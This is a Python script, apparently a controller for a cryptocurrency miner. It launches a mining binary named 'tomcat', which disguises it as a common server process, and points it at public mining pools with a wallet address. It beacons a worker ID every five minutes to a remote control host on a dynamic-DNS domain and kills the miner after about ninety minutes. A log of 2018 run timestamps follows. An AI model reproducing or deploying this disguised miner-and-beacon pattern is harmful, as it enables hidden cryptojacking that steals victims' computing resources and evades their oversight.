import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:07.305818
#2018-02-17 16:22:04.714667
#2018-02-17 18:09:06.095230
#2018-02-17 19:57:05.276007
#2018-02-17 21:45:06.984885
#2018-02-17 23:29:06.040321
#2018-02-18 01:19:05.588753
#2018-02-18 03:06:05.149521
#2018-02-18 04:53:04.714264
#2018-02-18 06:43:05.237706
#2018-02-18 08:32:07.498255
#2018-02-18 10:19:06.158343
#2018-02-18 12:05:07.534051
#2018-02-18 13:49:06.736044
#2018-02-18 15:41:06.632960
#2018-02-18 17:31:07.295555
#2018-02-18 19:18:01.243605
#2018-02-18 21:04:06.343038
#2018-02-18 22:52:05.400933
#2018-02-19 00:40:04.344182
#2018-02-19 02:26:07.180328
#2018-02-19 04:13:05.249947
#2018-02-19 05:57:05.483263
#2018-02-19 07:47:01.883280
#2018-02-19 09:37:01.863907
#2018-02-19 11:26:02.188500
#2018-02-19 13:13:01.807167
#2018-02-19 15:01:08.220793
#2018-02-19 16:49:04.435435
#2018-02-19 18:36:08.071609
#2018-02-19 20:21:07.833104
#2018-02-19 22:09:07.619187
#2018-02-19 23:56:04.565345
#2018-02-20 01:43:07.031795
#2018-02-20 03:32:06.834697
#2018-02-20 05:19:03.671239
#2018-02-20 07:03:01.480417
#2018-02-20 08:47:07.860865
#2018-02-20 10:31:07.324497
#2018-02-20 12:16:07.991526
#2018-02-20 14:04:08.519858
#2018-02-20 15:47:11.815317
#2018-02-20 17:34:09.474638
#2018-02-20 19:23:02.150693
#2018-02-20 21:11:06.845758
#2018-02-20 22:55:07.027721
#2018-02-21 00:37:02.207339
#2018-02-21 02:23:07.337908
#2018-02-21 04:11:04.601562
#2018-02-21 05:58:04.571456
#2018-02-21 07:46:03.639135
#2018-02-21 09:32:05.637014
#2018-02-21 11:20:08.215479
#2018-02-21 13:08:05.885342
#2018-02-21 14:54:09.477145
#2018-02-21 16:42:07.968776
#2018-02-21 18:33:01.439435
#2018-02-21 20:18:01.550670
#2018-02-21 22:06:02.006540
#2018-02-21 23:53:01.262001
#2018-02-22 01:42:07.830013
#2018-02-22 03:30:08.133065
#2018-02-22 05:17:06.330185
#2018-02-22 07:01:07.376625
#2018-02-22 08:48:05.904973
#2018-02-22 10:36:06.282560
#2018-02-22 12:24:08.815637
#2018-02-22 14:09:07.678643
#2018-02-22 15:55:11.401850
#2018-02-22 17:43:02.015763
#2018-02-22 19:30:09.898184
#2018-02-22 21:22:01.858787
#2018-02-22 23:08:06.075692
#2018-02-23 00:54:08.150367
#2018-02-23 02:43:03.760434
#2018-02-23 04:31:05.429625
#2018-02-23 06:17:07.728111
#2018-02-23 08:05:09.172424
#2018-02-23 10:22:04.987874
#2018-02-23 12:17:04.097021
#2018-02-23 14:04:08.290531
#2018-02-23 15:55:06.239328
#2018-02-23 17:40:10.943512
#2018-02-23 19:25:08.792612
#2018-02-23 21:08:05.531436
#2018-02-23 22:55:04.257701
#2018-02-24 00:41:07.378481
#2018-02-24 02:31:07.139729
#2018-02-24 04:24:05.200975
#2018-02-24 06:10:01.789181
#2018-02-24 07:57:06.605566
#2018-02-24 09:42:05.167582
#2018-02-24 11:38:05.334751
#2018-02-24 13:28:07.605342
#2018-02-24 15:17:06.443110
#2018-02-24 17:06:07.638161
#2018-02-24 18:58:03.778545
#2018-02-24 20:45:06.459445
#2018-02-24 22:59:06.129167
#2018-02-25 02:16:08.069843
#2018-02-25 05:50:03.736302
#2018-02-25 11:37:06.708702